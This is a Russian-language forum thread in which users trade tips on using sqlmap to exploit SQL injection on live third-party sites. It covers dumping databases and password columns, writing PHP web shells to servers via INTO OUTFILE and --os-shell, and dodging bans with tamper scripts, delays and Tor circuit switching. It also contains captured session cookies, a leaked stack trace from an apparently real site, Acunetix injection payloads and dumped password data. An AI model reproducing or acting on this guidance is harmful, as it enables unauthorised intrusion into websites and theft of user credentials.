Не "скармливайте" sqlmap-у раскрученную иньекцию, он не поймет так как сам будет пробывать "крутить", запрос должен быть что-то типо "http://www.site.ru/showbanner.php?banner_id=123" обязательно вставьте существующий banner_id дабы sqlmap смог найти boolean based иньекцию
SELECT 0xКод_скрипта_php_в_hex_который_хотим_залить INTO OUTFILE "Полный/путь/к/файлу.php"; Но сколько я не пробовал, никогда не получалось.
как минимум можно попытаться использовать tamper скрипты и опцию --delay, для того чтобы попытаться избежать бана если нужно ip менять то как вариант открыть контрол порт тора на который можно будет посылать запрос на смену цепочки нод а в sqlmap делать нечто вроде --eval="import os;os.system('тут команда которая говорит тору сменить цепочку')" либо написать скрипт который каждые N минут/секунд меняет глобальные системные прокси
--os-shell это залить шелл а sql-shell это просто функция для удобства вы пишете запрос select user from dual а sqlmap сам его подгоняет под тип sql иньекции дабы не пришлось самому руками скажем выводить посимвольно если boolean или time based.
GET /ad.php HTTP/1.1 Cookie: banner_xxx9=1; auth=hjefu7sci3os9heqgejp6f7gr2; lang=ru; rabotamd_ad=* SQL injection; banner=1; popup=1; pre_lang=ru; PHPSESSID=avqgopd70kth9gnhbutrj3qhu3; user_id=hjefu7sci3os9heqgejp6f7gr2; _ga=GA1.2.475953970.1455644353; _gat=1; FTID=1Mms8o1x-pLR1Mms8o; FTID=1Mms8o1x-pLR1Mms8o X-Requested-With: XMLHttpRequest Referer: --------------- Host: ---------------- Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* что делать так нехочет -r "C:\Users\doina\Desktop\88.txt" --eta --risk=3 --level=5 -dbs rabotamd_ad=
уважаемые всем привет, вопрос в следующем я заметил что сайты сделанные на asp или aspx менее подвержены раскрутке чем те же написанные на php, может есть какие - то приемы что сможет облегчить раскрутку узвимостей для данных платформ?
Тогда пожалуйста скажите как правильно залить php шелл на сервер с помощью функции --sql-shell, а то у меня ни разу не получилось.
и сразу в догонку вопрос, есть уязвимость, есть ошибка в бд вот такого плана: Incorrect syntax near ', '. Unclosed quotation mark after the character string ' ORDER BY createTime DESC'. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Exception Details: System.Data.SqlClient.SqlException: Incorrect syntax near ', '. Unclosed quotation mark after the character string ' ORDER BY createTime DESC'. Source Error: An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below. Stack Trace: [SqlException (0x80131904): Incorrect syntax near ', '. Unclosed quotation mark after the character string ' ORDER BY createTime DESC'.] System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +388 System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) +717 System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) +4515 System.Data.SqlClient.SqlDataReader.TryConsumeMetaData() +61 System.Data.SqlClient.SqlDataReader.get_MetaData() +134 System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) +6557689 System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async, Int32 timeout, Task& task, Boolean asyncWrite, SqlDataReader ds) +6560327 System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, TaskCompletionSource`1 completion, Int32 timeout, Task& task, Boolean asyncWrite) +586 System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method) +104 System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior, String method) +288 System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior) +237 Baina.Library.Core.SqlDataContext.ExecuteReader(CommandType cmdType, String cmdText, IList`1 commandParameters) +251 Baina.Library.Core.EntityRepository`1.Query(ICriteria criteria) +395 Baina.Flikie.Wallpaper.WallpaperService.QueryInternal(String keyword, String resolution, Int32 contentLevel, String order, Int32 startIndex, Int32 resultSize) +134 Baina.Flikie.Wallpaper.WallpaperService.QueryFromCacheOrInternal(String keyword, String resolution, Int32 contentLevel, String order, Int32 sIndex, Int32 resultSize) +348 Baina.Flikie.Wallpaper.WallpaperService.Query(String keyword, String resolution, Int32 contentLevel, String order, Int32 startIndex, Int32 resultSize) +338 Baina.Flikie.Wallpaper.UserWallpaperService.QueryWallpaper(Int32 userId, String keyword, String resolution, Int32 contentLevel, String order, Int32 startIndex, Int32 resultSize) +87 Baina.Flikie.Web.MobileSite.Controllers.WallpaperController.GetWallpaperSearchResult(Int32 userId, String keywords) in D:\dolphin\Flikie\MobileSite\Controllers\WallpaperController.cs:96 Baina.Flikie.Web.MobileSite.Controllers.WallpaperController.Index(Int32 id, String wallpaperName) in D:\dolphin\Flikie\MobileSite\Controllers\WallpaperController.cs:132 lambda_method(Closure , ControllerBase , Object[] ) +167 System.Web.Mvc.ReflectedActionDescriptor.Execute(ControllerContext controllerContext, IDictionary`2 parameters) +247 System.Web.Mvc.ControllerActionInvoker.InvokeActionMethod(ControllerContext controllerContext, ActionDescriptor actionDescriptor, IDictionary`2 parameters) +39 System.Web.Mvc.<>c__DisplayClassd.<InvokeActionMethodWithFilters>b__a() +120 System.Web.Mvc.ControllerActionInvoker.InvokeActionMethodFilter(IActionFilter filter, ActionExecutingContext preContext, Func`1 continuation) +637 System.Web.Mvc.ControllerActionInvoker.InvokeActionMethodWithFilters(ControllerContext controllerContext, IList`1 filters, ActionDescriptor actionDescriptor, IDictionary`2 parameters) +307 System.Web.Mvc.ControllerActionInvoker.InvokeAction(ControllerContext controllerContext, String actionName) +720 System.Web.Mvc.Controller.ExecuteCore() +162 System.Web.Mvc.<>c__DisplayClass8.<BeginProcessRequest>b__4() +58 System.Web.Mvc.Async.<>c__DisplayClass1.<MakeVoidDelegate>b__0() +15 System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +606 System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) +288 но не критится, может я что не так делаю?
У меня сразу два вопроса) 1)Хавиж показывает что в базе 40к строк,ставлю мапом на дамп - дампит только 400 строк и все!Как с этим бороться? 2)Почему иногда мап при дампе выдает пустоту не Null а просто пустая строчка- как с этим бороться?
Не получается слить пароли в нормальной кодировке, получаются вот такие: Code: +------------------------------------------+ | Password | +------------------------------------------+ | \x00\x07\x8ccï\x8e\x1c°\x12\x1a\x89ÂÁr£¾ | | \x00\t@ ÜáZ+Sxô\x0c\x82Ùp | | \x00\x12\x87T\x9az¸ã<C\x9c\x9c2ô¢§ | | \x00#÷\x15X¹"P~?\x86¼[L\x16 | | \x00'2@T_¶·\x82H\x9dÞ½<.\x95 | | \x003y-!³Ä¡ÉG\x9fß\x19\x86P\x85 | | \x003y-!³Ä¡ÉG\x9fß\x19\x86P\x85 | | \x003y-!³Ä¡ÉG\x9fß\x19\x86P\x85 | | \x008õ¡XÃÌ\x03ÏBA\x9bį\x89\x1f | | \x00Cá*¸\x16%\x02Z9_r\x90¡s) | | \x00Mç Ç=<_᡼o=Üqì | | \x00Q!«Äè~\x02&nrc9§4\x10 | | \x00WdÜ¢ÔÉÍ~Þ\x1b÷\x83¨Éì | | \x00]®¾\x05ü/^;\x87`çÇ8~à | | \x00xB½ÿ\x1c\x1dª\x0c\r\x95ÜóÙ"B | | \x00~¯©À\x8c±\x80OãÃr² ~ | | \x00\x88\x85â1e\x8f¹\x7f೿\x15£çÝ | | \x00\x8aÁÏ«¬L\x0cÀZÊüïe:\x9d | | \x00\x8d\x8f\x82¥\x19òDw\x15\x90°qµ=ÿ | | \x00°9\x869j\x90N[Ñ·\x12\x06V\x86ª | | \x00²v\x9dcöÄͶ¯a<Ì\x18çq | | \x00ØX\x83$¥#\x13¦s\x04\x13ãß\x1d« | | \x00Ø\x86fÂoø)ÕêƸÍù#\x04 | | \x00àÛã\x16°÷\x158\x92°\x9f\x0f\x1b® | +------------------------------------------+ Параметры такие Code: -D database -T Users -C Password --dump
Так не хочет Code: [15:40:30] [CRITICAL] switch '--no-cast' is incompatible with switch '--hex' Параметры сервера рапортует такие Code: web server operating system: Windows 8.1 or 2012 R2 web application technology: ASP.NET, Microsoft IIS 8.5, ASP.NET 2.0.50727 back-end DBMS: MySQL 5.0
Ребят подскажите пожалуйста В чем отличие ,если дампить с ключами -D olololo -T ololol -C username,password and etc --dump , сливает как обычно ,с небольшой скоростью А если пробывать через --sql-shell с командами select * from ololol.ololol сливает все таблицу за пару секунд ,получалось такое на пару сайтов .Вот и хотелось бы узнать в чем отличие
странный вопрос, во втором случае по факту прямой доступ к бд и одним запросом ты берешь все хотя и могут быть ограничения, а в первом тянется все кучей запросов последовательно
нет, но вы можете легко написать инъекции XPATH, если вы знаете язык сценариев и базы данных, если это SOAP вебсервис вы можете использовать библиотеку как handsoap и написать несколько полезных нагрузок вне для конкретной базы данных и запустить скрипт для приложений веб-вам безопасность на самом деле что-нибудь большой без какой-либо возможности программирования не может сделать.
Как раскрутить такую скулю? site.ru/v2-live-with-a-5-1-win/ Acunetix: Path Fragment (suffix /) input - was set to success' AND 3*2*1=6 AND '000CDY9'='000CDY9 site.ru/v2-live-with-a-5-1-win'%20AND%203*2*1%3d6%20AND%20'000SgxW'%3d'000SgxW/
